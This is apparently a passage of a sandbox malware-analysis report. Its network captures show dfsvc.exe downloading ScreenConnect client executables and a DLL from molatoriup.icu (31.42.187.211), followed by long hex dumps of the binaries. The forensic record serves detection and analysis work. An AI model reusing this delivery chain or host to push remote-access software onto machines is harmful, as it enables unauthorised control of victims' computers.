65 6e 64 6f 72 53 65 74 75 70 00 66 43 6f 6e 74 65 78 74 52 65 71 00 53 79 73 74 65 6d 2e 4c Data Ascii: <9>__CloseDesktopCreateDesktopSwitchDesktopOpenDesktoplpDesktopTryEnsureThreadOnInputDesktopOpenInputDesktoplpszDesktopdesktope_spUriSchemeHttpNativeCleanuplpLoadOrderGroupGetLastActivePopupAppDomainSetuppszVendorSetupfContextReqSystem.L
2024-10-04 23:03:20 UTC	16384	IN	Data Raw: 4f 70 65 6e 52 65 67 69 73 74 72 79 4b 65 79 00 43 72 65 61 74 65 50 72 6f 70 65 72 74 79 4b 65 79 00 47 65 74 48 6f 74 6b 65 79 00 53 65 74 48 6f 74 6b 65 79 00 70 77 48 6f 74 6b 65 79 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 41 73 73 65 6d 62 6c 79 00 67 65 74 5f 46 6f 6e 74 46 61 6d 69 6c 79 00 44 65 66 61 75 6c 74 46 6f 6e 74 46 61 6d 69 6c 79 00 54 72 79 44 69 73 61 62 6c 65 46 69 6c 65 53 79 73 74 65 6d 52 65 64 69 72 65 63 74 69 6f 6e 54 65 6d 70 6f 72 61 72 69 6c 79 00 73 65 74 5f 52 65 61 64 4f 6e 6c 79 00 44 69 73 70 6f 73 65 51 75 69 65 74 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e 42 6c 6f 63 6b 52 65 61 73 6f 6e 44 65 73 74 72 6f 79 00 Data Ascii: OpenRegistryKeyCreatePropertyKeyGetHotkeySetHotkeypwHotkeySystem.Security.Cryptographyget_Assemblyget_FontFamilyDefaultFontFamilyTryDisableFileSystemRedirectionTemporarilyset_ReadOnlyDisposeQuietlypointlySelectManyShutdownBlockReasonDestroy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49754	31.42.187.211	443	7120	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 23:03:22 UTC	98	OUT	GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1 Host: molatoriup.icu Accept-Encoding: gzip
2024-10-04 23:03:22 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 601376 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-437666475 Microsoft-HTTPAPI/2.0 Date: Fri, 04 Oct 2024 23:02:46 GMT Connection: close
2024-10-04 23:03:22 UTC	16168	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 3c 99 98 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 fc 08 00 00 06 00 00 00 00 00 00 92 15 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 19 78 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL{<"0 @ `x@
2024-10-04 23:03:22 UTC	16384	IN	Data Raw: 0a 2a 00 00 1b 30 06 00 ef 0d 00 00 2c 00 00 11 73 ab 07 00 06 0a 06 02 7d 14 03 00 04 28 75 01 00 0a 2c 1c 72 9d 0a 00 70 17 17 28 76 01 00 0a 28 77 01 00 0a 16 8d 11 00 00 01 28 78 01 00 0a 02 17 7d 48 00 00 04 02 28 e4 00 00 06 17 28 cf 01 00 0a 0b 02 28 fd 00 00 06 0c 02 28 dc 00 00 06 7e a9 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 25 07 00 06 73 d0 01 00 0a 25 80 a9 02 00 04 28 33 00 00 2b 6f d1 01 00 0a 0d 38 24 0c 00 00 12 04 09 6f d2 01 00 0a 7d 16 03 00 04 11 04 7b 16 03 00 04 28 2c 00 00 2b 13 05 11 04 7b 16 03 00 04 6f 15 03 00 06 28 36 06 00 06 13 06 11 04 7b 16 03 00 04 6f 29 03 00 06 28 4a 06 00 06 13 07 11 04 7b 16 03 00 04 6f 2a 03 00 06 28 4a 06 00 06 13 08 11 04 7b 16 03 00 04 6f 15 03 00 06 02 28 fb 00 00 06 25 13 0e 6f a2 00 00 0a 11 Data Ascii: 0,s}(u,rp(v(w(x}H((((~%-&~%s%(3+o8$o}{(,+{o(6{o)(J{o(J{o(%o
2024-10-04 23:03:23 UTC	16384	IN	Data Raw: 7b 54 00 00 04 6f 0b 07 00 06 18 2e 0c 02 7b 54 00 00 04 16 6f a2 00 00 0a 2a 00 00 13 30 03 00 62 00 00 00 00 00 00 00 02 7b 54 00 00 04 6f 14 03 00 0a 2c 4d 02 7b 5a 00 00 04 28 a9 00 00 06 6f b8 04 00 06 02 7b 54 00 00 04 16 6f a2 00 00 0a 02 7b 54 00 00 04 02 7b 54 00 00 04 6f 14 03 00 0a 74 9a 00 00 01 17 6f 15 03 00 0a 26 02 7b 54 00 00 04 14 6f 7b 01 00 0a 02 17 28 3c 01 00 06 2a 02 16 28 3c 01 00 06 2a 00 00 13 30 05 00 90 00 00 00 47 00 00 11 72 1d 14 00 70 18 8d 11 00 00 01 25 16 03 8c 33 02 00 01 a2 25 17 02 7b 54 00 00 04 6f 0b 07 00 06 8c b6 00 00 02 a2 28 07 03 00 0a 02 7b 54 00 00 04 6f 0b 07 00 06 0a 06 17 2e 06 06 18 2e 27 2b 35 02 7b 5a 00 00 04 28 aa 00 00 06 6f b8 04 00 06 03 2d 22 02 28 ae 00 00 06 73 0a 03 00 0a 6f 45 01 00 0a 2b 10 Data Ascii: {To.{To0b{To,M{Z(o{To{T{Toto&{To{(<(<*0Grp%3%{To({To..'+5{Z(o-"(soE+
2024-10-04 23:03:23 UTC	16384	IN	Data Raw: 27 04 00 0a 28 b2 00 00 2b 28 b3 00 00 2b 6f 28 04 00 0a 2a c2 02 28 29 04 00 0a 02 7e 2a 04 00 0a 28 2b 04 00 0a 02 20 02 60 00 00 17 28 2c 04 00 0a 02 02 fe 06 dd 01 00 06 73 2d 04 00 0a 28 2e 04 00 0a 2a 1e 02 7b 9b 00 00 04 2a 22 02 03 7d 9b 00 00 04 2a 1e 02 7b 9c 00 00 04 2a 22 02 03 7d 9c 00 00 04 2a 1e 02 7b 9d 00 00 04 2a 22 02 03 7d 9d 00 00 04 2a 1e 02 7b 9e 00 00 04 2a 22 02 03 7d 9e 00 00 04 2a 1e 02 7b 9f 00 00 04 2a 22 02 03 7d 9f 00 00 04 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 1e 02 7b a3 00 00 04 2a 22 02 03 7d a3 00 00 04 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00 04 Data Ascii: '(+(+o(()~(+ `(,s-(.{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}
2024-10-04 23:03:23 UTC	16384	IN	Data Raw: 0a 2c 07 02 28 a4 02 00 06 2a 02 6f 18 04 00 0a 2a 00 00 00 13 30 02 00 51 00 00 00 93 00 00 11 02 28 61 05 00 0a 2d 1d 02 28 9b 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 9b 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 a2 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 a2 02 00 06 2a 02 6f 17 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 9f 02 00 06 2c 07 02 28 9f 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 a6 02 00 06 2c 07 02 28 a6 02 00 06 2a 02 6f c6 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 a1 02 00 06 2c 07 02 28 a1 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 aa 02 00 06 2c 07 02 28 aa 02 00 06 2a 02 28 99 02 00 06 2a 00 00 00 1b 30 06 00 f0 00 00 00 94 00 00 11 02 03 28 ce 01 00 06 02 6f c4 02 00 06 0a 12 00 28 63 05 Data Ascii: ,(o0Q(a-((b,({,((b,(o(a-(,({,(,(o(a-(,({,(,((*0(o(c
2024-10-04 23:03:23 UTC	16384	IN	Data Raw: 06 00 0a 2a 32 02 7b 38 01 00 04 6f 09 06 00 0a 2a 36 02 7b 38 01 00 04 03 6f 0a 06 00 0a 2a 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b9 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 07 00 29 00 00 00 5a 00 00 11 02 02 7b 3a 01 00 04 73 8a 03 00 06 25 02 02 7b 39 01 00 04 0a 06 17 58 7d 39 01 00 04 06 6f 89 03 00 06 28 50 01 00 2b 2a 66 02 16 7d 39 01 00 04 02 28 83 03 00 06 02 7b 38 01 00 04 6f 0b 06 00 0a 2a 1e 02 28 83 03 00 06 2a 32 02 7b 38 01 00 04 6f 0c 06 00 0a 2a 32 02 7b 38 01 00 04 28 72 01 00 Data Ascii: 2{8o6{8o0){:(t\|:(O+30){:(t\|:(O+30)Z{:s%{9X}9o(P+f}9({8o(2{8o*2{8(r
2024-10-04 23:03:23 UTC	16384	IN	Data Raw: 3d 05 00 04 2c 0b 06 7b 3d 05 00 04 6f 22 00 00 0a dc 06 7b 3c 05 00 04 2c 0b 06 7b 3c 05 00 04 6f 22 00 00 0a dc 07 2c 06 07 6f 22 00 00 0a dc 28 60 07 00 0a 26 dc 2a 01 34 00 00 02 00 69 00 41 aa 00 14 00 00 00 00 02 00 35 00 89 be 00 14 00 00 00 00 02 00 24 00 ae d2 00 0a 00 00 00 00 02 00 14 00 c8 dc 00 07 00 00 00 00 13 30 06 00 4a 00 00 00 00 00 00 00 02 28 ad 01 00 06 02 20 16 22 00 00 17 28 2c 04 00 0a 02 17 28 b1 07 00 0a 02 22 00 00 80 3f 7d 73 01 00 04 02 7e bb 05 00 0a 28 0d 05 00 06 73 82 05 00 0a 7d 74 01 00 04 02 18 17 16 16 02 73 b2 07 00 0a 7d 71 01 00 04 2a 00 00 13 30 03 00 29 00 00 00 16 00 00 11 02 7b 78 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 01 00 00 1b 0c 02 7c 78 01 00 04 08 07 28 09 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 Data Ascii: =,{=o"{<,{<o",o"(`&4iA5$0J( "(,("?}s~(s}ts}q0){x(t\|x(+3*0
2024-10-04 23:03:23 UTC	16384	IN	Data Raw: d1 01 00 2b 7e 85 05 00 04 fe 06 dd 0a 00 06 73 60 01 00 0a 28 21 00 00 2b 0c 28 92 08 00 0a 08 25 2d 0b 26 d0 8c 00 00 02 28 bf 00 00 0a 6f 41 05 00 06 28 c3 04 00 06 2a 1a 7e b6 01 00 04 2a 1e 02 80 b6 01 00 04 2a 86 28 92 08 00 0a 02 6f 41 05 00 06 28 c3 04 00 06 7e aa 00 00 0a 02 6f b0 03 00 0a 6f 93 08 00 0a 2a 2e 28 c2 04 00 06 6f 5e 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 4a 05 00 06 2a 2e 28 c2 04 00 06 6f 4c 05 00 06 2a 2e 28 c2 04 00 06 6f 48 05 00 06 2a 2e 28 c2 04 00 06 6f 42 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 46 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 62 05 00 06 2a 2e 28 c2 04 00 06 6f 64 05 00 06 2a 2e 28 c2 04 00 06 6f 66 05 00 06 2a 2e 28 c2 04 00 Data Ascii: +~s`(!+(%-&(oA(~(oA(~oo.(o^.(oD.(oJ.(oL.(oH.(oB.(oD.(oF.(oD.(ob.(od.(of.(
2024-10-04 23:03:23 UTC	16384	IN	Data Raw: 25 80 d2 05 00 04 16 28 21 01 00 2b 2a 00 00 00 13 30 03 00 45 00 00 00 41 01 00 11 73 9f 09 00 0a 0a 06 03 7d a0 09 00 0a 02 06 fe 06 a1 09 00 0a 73 a2 09 00 0a 15 28 16 02 00 2b 7e a3 09 00 0a 25 2d 17 26 7e a4 09 00 0a fe 06 a5 09 00 0a 73 a6 09 00 0a 25 80 a3 09 00 0a 28 17 02 00 2b 2a 00 00 00 1b 30 03 00 2e 00 00 00 42 01 00 11 7e a7 09 00 0a 72 18 40 00 70 02 8c 64 00 00 01 28 1d 06 00 0a 6f a8 09 00 0a 0a 06 14 fe 03 0b de 0a 06 2c 06 06 6f 22 00 00 0a dc 07 2a 00 00 01 10 00 00 02 00 1b 00 07 22 00 0a 00 00 00 00 aa 28 01 03 00 0a 1c 16 73 02 03 00 0a 28 03 03 00 0a 2c 15 d0 23 03 00 01 28 bf 00 00 0a 6f 93 07 00 0a 28 10 06 00 06 2a 16 2a 56 28 11 06 00 06 2d 07 02 73 f2 06 00 06 2a 02 73 ed 06 00 06 2a 66 28 11 06 00 06 2d 09 02 03 04 73 e9 06 Data Ascii: %(!+0EAs}s(+~%-&~s%(+0.B~r@pd(o,o""(s(,#(o(V(-ss*f(-s
2024-10-04 23:03:23 UTC	16384	IN	Data Raw: fc 01 00 0a 02 17 28 13 0b 00 0a 02 28 14 0b 00 0a 02 28 bb 01 00 0a 28 f9 01 00 0a 2a 76 02 28 23 08 00 0a 25 20 00 00 00 80 6f e5 04 00 0a 25 20 88 00 00 00 6f e6 04 00 0a 2a 00 13 30 05 00 bd 00 00 00 91 01 00 11 0f 01 28 f0 01 00 0a 2c 2b 02 28 df 00 00 0a 0f 01 28 f3 01 00 0a 28 15 0b 00 0a 28 7f 00 00 0a 2c 12 0f 01 28 f3 01 00 0a 28 86 00 00 0a 73 3b 05 00 0a 2a 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 f6 01 00 0a 17 28 10 07 00 06 0a 12 00 28 08 03 00 0a 2d 64 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 16 0b 00 0a 17 28 10 07 00 06 0b 12 01 28 08 03 00 0a 2d 3f 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 f1 01 00 0a 16 28 10 07 00 06 0c 12 02 28 08 03 00 0a 2d 1a 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 ed 01 00 0a 16 28 10 07 00 06 2a Data Ascii: ((((v(#% o% o0(,+((((,((s;(((((-d(((((-?(((((-((((

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49755	31.42.187.211	443	7120	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 23:03:24 UTC	89	OUT	GET /Bin/ScreenConnect.Core.dll HTTP/1.1 Host: molatoriup.icu Accept-Encoding: gzip
2024-10-04 23:03:24 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 548864 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-437666475 Microsoft-HTTPAPI/2.0 Date: Fri, 04 Oct 2024 23:02:47 GMT Connection: close
2024-10-04 23:03:24 UTC	16168	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a fa ad c1 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 58 08 00 00 06 00 00 00 00 00 00 ea 72 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 af 44 09 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELz" 0Xr D@
2024-10-04 23:03:24 UTC	16384	IN	Data Raw: 26 2a 1e 02 7b 6c 01 00 0a 2a 22 02 03 7d 6c 01 00 0a 2a 3a 02 28 3c 00 00 0a 02 03 28 6d 01 00 0a 2a 00 00 13 30 02 00 28 00 00 00 3c 00 00 11 03 6f 46 01 00 0a 0a 02 7b 6e 01 00 0a 2d 0f 06 28 2b 00 00 2b 2c 07 02 06 7d 6e 01 00 0a 06 02 7b 6e 01 00 0a fe 01 2a 3e 03 6f 15 07 00 06 04 6f 15 07 00 06 fe 01 2a 3e 02 03 28 6f 01 00 0a 02 15 7d 70 01 00 0a 2a 13 30 03 00 33 01 00 00 3d 00 00 11 03 2d 0a 12 01 fe 15 81 00 00 1b 07 2a 02 03 28 71 01 00 0a 0a 03 6f 15 07 00 06 02 7b 70 01 00 0a fe 01 06 5f 2c 42 02 7b 72 01 00 0a 8c 81 00 00 1b 2c 18 02 28 73 01 00 0a 02 fe 06 74 01 00 0a 73 75 01 00 0a 28 2c 00 00 2b 26 02 15 7d 70 01 00 0a 02 7c 72 01 00 0a fe 15 81 00 00 1b 12 01 fe 15 81 00 00 1b 07 2a 03 6f 15 07 00 06 02 7b 70 01 00 0a 33 07 02 7b 72 01 Data Ascii: &{l"}l:(<(m0(<oF{n-(++,}n{n>oo>(o}p03=-(qo{p_,B{r,(stsu(,+&}p\|r*o{p3{r
2024-10-04 23:03:24 UTC	16384	IN	Data Raw: 3a 02 03 28 7d 00 00 2b 28 7e 00 00 2b 26 2a 00 13 30 03 00 54 00 00 00 42 00 00 11 02 45 04 00 00 00 02 00 00 00 0c 00 00 00 20 00 00 00 16 00 00 00 2b 28 03 04 73 c6 02 00 0a 0a 2b 30 03 04 73 c7 02 00 0a 0a 2b 26 03 04 73 c8 02 00 0a 0a 2b 1c 03 04 73 94 01 00 0a 0a 2b 12 72 b9 0c 00 70 02 8c b5 00 00 02 14 73 c9 02 00 0a 7a 06 2a 5a d0 8e 00 00 1b 28 3c 01 00 0a 02 28 ca 02 00 0a a5 8e 00 00 1b 2a 9e 03 02 7e d3 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 a7 0e 00 06 73 cb 02 00 0a 25 80 d3 05 00 04 28 7f 00 00 2b 2a 00 1b 30 01 00 25 00 00 00 1e 00 00 11 02 28 cc 02 00 0a 2d 0a 12 00 fe 15 8e 00 00 1b 06 2a 00 03 6f 08 02 00 0a 0a de 07 02 28 2d 01 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 13 00 09 1c 00 07 00 00 00 00 3a 02 03 28 e9 04 00 06 28 80 00 Data Ascii: :(}+(~+&0TBE +(s+0s+&s+s+rpszZ(<(~%-&~s%(+0%(-o(-:((
2024-10-04 23:03:24 UTC	16384	IN	Data Raw: d4 00 00 11 02 03 6f 3a 04 00 0a 0a 06 15 33 0a 12 01 fe 15 b3 01 00 1b 07 2a 02 16 06 6f 86 03 00 0a 02 06 17 58 6f f2 02 00 0a 28 59 00 00 2b 73 39 04 00 0a 2a fe 02 25 2d 06 26 7e 98 01 00 0a 03 6f 8c 01 00 0a 7e e5 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 b9 0e 00 06 73 9f 02 00 0a 25 80 e5 05 00 04 28 b3 00 00 2b 28 6e 04 00 06 28 72 00 00 2b 2a 6e 03 0f 00 28 14 04 00 0a 81 8e 00 00 1b 04 0f 00 28 15 04 00 0a 81 8f 00 00 1b 2a 3e 1f fe 73 9a 0f 00 06 25 02 7d a2 06 00 04 2a ae 02 16 16 16 16 73 27 03 00 06 7e d1 05 00 04 25 2d 13 26 14 fe 06 44 03 00 06 73 3b 04 00 0a 25 80 d1 05 00 04 28 d4 00 00 2b 2a 82 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 2d 04 16 6a 2b 02 15 6a 28 4c 05 00 06 28 d6 00 00 2b 2a 26 02 03 66 5f 04 03 5f 60 2a 76 02 28 d5 00 00 Data Ascii: o:3oXo(Y+s9%-&~o~%-&~s%(+(n(r+n((>s%}s'~%-&Ds;%(+(+(+-j+j(L(+&f__`v(
2024-10-04 23:03:24 UTC	16384	IN	Data Raw: fd 00 00 00 1f 01 00 11 1f 12 8d b8 00 00 01 25 16 72 e8 13 00 70 a2 25 17 02 28 54 07 00 06 28 56 0b 00 06 a2 25 18 72 fe 13 00 70 a2 25 19 02 28 56 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1a 72 10 14 00 70 a2 25 1b 02 28 58 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1c 72 22 14 00 70 a2 25 1d 02 28 5a 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1e 72 34 14 00 70 a2 25 1f 09 02 28 5c 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1f 0a 72 32 13 00 70 a2 25 1f 0b 02 28 5e 07 00 06 28 56 0b 00 06 a2 25 1f 0c 72 48 14 00 70 a2 25 1f 0d 02 28 60 07 00 06 0b 12 01 fe 16 2c 01 00 02 6f 43 00 00 0a a2 25 1f 0e 72 68 14 00 70 a2 25 1f 0f 02 28 62 07 00 06 0c 12 02 fe 16 2d 01 00 02 6f 43 00 00 0a a2 25 1f 10 72 80 14 00 70 a2 25 1f 11 02 28 64 07 00 06 0d 12 03 28 2f 05 00 0a a2 Data Ascii: %rp%(T(V%rp%(V(%rp%(X(%r"p%(Z(%r4p%(\(%r2p%(^(V%rHp%(`,oC%rhp%(b-oC%rp%(d(/
2024-10-04 23:03:24 UTC	16384	IN	Data Raw: f5 01 00 06 6a 58 7d d8 03 00 04 02 02 7b d9 03 00 04 7e 2a 06 00 0a 28 81 01 00 2b 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2b 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2d 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 56 02 28 36 0a 00 06 02 03 7d da 03 00 04 02 04 7d db 03 00 04 2a 1e 02 7b da 03 00 04 2a 1e 02 7b db 03 00 04 2a 5a 03 02 28 3e 0a 00 06 5a 1e 28 19 04 00 06 02 28 3f 0a 00 06 58 2a 86 02 03 04 28 3d 0a 00 06 02 05 75 98 00 00 02 7d dc 03 00 04 02 05 75 97 00 00 02 7d dd 03 00 04 2a 86 02 03 28 63 01 00 0a 03 2c 16 02 7b dc 03 00 04 28 16 Data Ascii: jX}{~(+0)Q{(+tO\|(+30)Q{(-tO\|(+3V(6}}{{Z(>Z((?X(=u}u}*(c,{(
2024-10-04 23:03:24 UTC	16384	IN	Data Raw: 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 1b 30 06 00 44 00 00 00 79 01 00 11 03 6f 16 07 00 0a 0a 2b 26 06 6f 17 07 00 0a 0b 07 04 07 6f 0a 0c 00 06 02 05 07 6f 09 0c 00 06 28 0a 09 00 06 6f 0d 0c 00 06 28 02 0c 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 b2 02 28 3c 00 00 0a 02 03 7d 3d 04 00 04 02 04 7d 3e 04 00 04 02 05 7d 3f 04 00 04 02 0e 04 7d 40 04 00 04 02 0e 05 7d 41 04 00 04 2a 1e 02 7b 3d 04 00 04 2a 1e 02 7b 3e 04 00 04 2a 1e 02 7b 3f 04 00 04 2a 1e 02 7b 40 04 00 04 2a 1e 02 7b 41 04 00 04 2a 00 00 00 1b 30 02 00 47 00 00 00 2a 00 00 11 7e 1b 07 00 0a 2d 3a 7e 1c 07 00 0a 0a 06 28 2c 01 00 0a 7e 1b 07 00 Data Ascii: o-,o290Dyo+&ooo(o(o-,o29(<}=}>}?}@}A{={>{?{@{A0G*~-:~(,~
2024-10-04 23:03:24 UTC	16384	IN	Data Raw: 06 04 3a 6a ff ff ff 2a 0a 17 2a 0a 17 2a 0a 17 2a 0a 17 2a 06 2a 00 00 13 30 05 00 1c 00 00 00 08 00 00 11 05 0e 04 8e 69 0e 05 59 28 60 01 00 0a 0a 03 04 0e 04 0e 05 06 28 32 02 00 0a 06 2a 1a 73 6a 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 ac 0d 00 06 80 32 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 33 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 7f 01 00 0a 6f 7b 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 88 01 00 0a 6f 7b 01 00 0a 2a 2e 73 b5 0d 00 06 80 38 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 5d 02 00 06 2a 22 03 04 28 63 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 13 30 03 00 1d 00 00 00 b0 01 00 11 02 7b 3b 05 00 04 03 16 28 ef 01 00 2b 0a 12 00 1f 64 28 7a 08 00 0a 6f 36 02 00 06 2a 00 00 00 13 30 03 00 1b 00 00 Data Ascii: :j*****0iY(`(2sjz(<.s2(<2{3oB(<6{o{(<6{o{.s8(<"(]"(c(<0{;(+d(zo60
2024-10-04 23:03:24 UTC	16384	IN	Data Raw: 00 04 28 56 06 00 06 8c da 02 00 02 2a 1e 02 28 3c 00 00 0a 2a 36 02 7b 2f 0a 00 0a 16 6f 30 0a 00 0a 2a 36 02 7b 2f 0a 00 0a 17 6f 30 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 22 05 00 0a 02 7b 23 05 00 0a 28 31 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 27 05 00 0a 02 7b 28 05 00 0a 28 31 0a 00 0a 2a 2e 73 0b 10 00 06 80 25 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 22 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 0f 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 12 10 00 06 80 2a 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 52 0b 00 06 2a 3a 0f 01 fe 16 4e 01 00 02 6f 43 00 00 0a 2a 2e 73 16 10 00 06 80 2d 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 3a 0f 01 fe 16 c4 00 00 02 6f 43 00 00 0a 2a 1e 02 28 3c 00 00 0a 2a 2e Data Ascii: (V(<6{/o06{/o0(<J{"{#(1(<J{'{((1.s%(<o"oC.s((<oC.s(<"(R:NoC.s-(<:oC(<.
2024-10-04 23:03:24 UTC	16384	IN	Data Raw: f7 02 01 00 10 00 4c b0 00 00 ad 3d 01 00 45 00 8d 01 fb 02 09 01 10 00 89 2e 01 00 ad 3d 01 00 6d 00 8d 01 fc 02 a1 00 10 00 48 26 00 00 ad 3d 01 00 00 00 90 01 03 03 81 01 10 00 fd 2b 01 00 ad 3d 01 00 35 00 90 01 04 03 01 01 00 00 a0 6a 01 00 ad 3d 01 00 c5 00 90 01 05 03 01 01 00 00 00 8e 00 00 ad 3d 01 00 c5 00 96 01 05 03 09 01 10 00 ba 36 01 00 ad 3d 01 00 6d 00 9c 01 05 03 09 01 10 00 6c 50 01 00 ad 3d 01 00 6d 00 a0 01 0d 03 09 01 10 00 4f bc 00 00 ad 3d 01 00 6d 00 a2 01 1b 03 09 01 10 00 1c 3b 01 00 ad 3d 01 00 6d 00 a4 01 26 03 09 01 10 00 12 00 01 00 ad 3d 01 00 6d 00 a8 01 4d 03 81 01 10 00 52 3b 01 00 ad 3d 01 00 35 00 ab 01 61 03 01 20 10 00 84 e3 00 00 ad 3d 01 00 35 00 ad 01 6a 03 01 20 10 00 d3 34 01 00 ad 3d 01 